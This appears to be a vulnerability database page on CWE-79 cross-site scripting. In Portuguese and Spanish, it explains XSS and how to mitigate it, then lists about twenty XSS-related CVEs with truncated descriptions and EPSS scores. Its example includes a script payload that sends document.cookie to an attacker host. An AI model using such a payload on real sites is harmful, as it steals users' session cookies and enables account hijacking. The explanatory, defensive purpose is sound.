Fallos del tipo CWE-79

28.832 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-35251MEDIUMA cross-site scripting vulnerability exists in Rocket.chat <v5 due to style injection in the complete chat window, an adversary is able to mEPSS 0.6%CVE-2023-23636MEDIUMIn Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from tEPSS 0.6%CVE-2026-73043CRITICALSiYuan before v3.7.4 Remote Code Execution via Template CalculationEPSS 0.6%CVE-2021-24622—WP Ticket < 5.10.4 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-40312MEDIUMReflected XSS in multiple JSP files in opennms/opennmsEPSS 0.6%CVE-2021-24722—Restaurant Menu by MotoPress < 2.4.2 - Admin+ Stored Cross Site ScriptingEPSS 0.6%CVE-2025-2767HIGHArista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution VulnerabilityEPSS 0.6%CVE-2021-24793—WPeMatico RSS Feed Fetcher < 2.6.12 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2018-3716—simplehttpserver node module suffers from a Cross-Site Scripting vulnerability to a lack of validation of file names.EPSS 0.6%CVE-2026-3001MEDIUMGutenverse <= 3.4.6 - Reflected Cross-Site Scripting via 's' ParameterEPSS 0.6%CVE-2021-24740—Tutor LMS < 1.9.9 - Multiple Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-30790MEDIUMMonicaHQ version 4.0.0 allows an authenticated remote attacker to execute malicious code in the application via CSTI in the `people:id/relatEPSS 0.6%CVE-2024-26057MEDIUMAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.6%CVE-2023-30787MEDIUMMonicaHQ version 4.0.0 allows an authenticated remote attacker to execute malicious code in the application via CSTI in the `people:id/introEPSS 0.6%CVE-2025-22270HIGHStored XSS in CyberArk Endpoint Privilege ManagerEPSS 0.6%CVE-2021-24612—Sociable <= 4.3.4.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2026-86483MEDIUMIn JetBrains YouTrack before 2026.2.18634 stored XSS via a custom field on Agile board cards was possibleEPSS 0.6%CVE-2021-38403MEDIUMDelta Electronics DIALinkEPSS 0.6%CVE-2017-0891—Nextcloud Server before 9.0.58 and 10.0.5 and 11.0.3 are vulnerable to an inadequate escaping of error messages leading to XSS vulnerabilitiEPSS 0.6%CVE-2018-10726MEDIUMA stored XSS vulnerability was found in Datenstrom Yellow 0.7.3 via an "Edit page" action. NOTE: the vendor disputes the relevance of this rEPSS 0.6%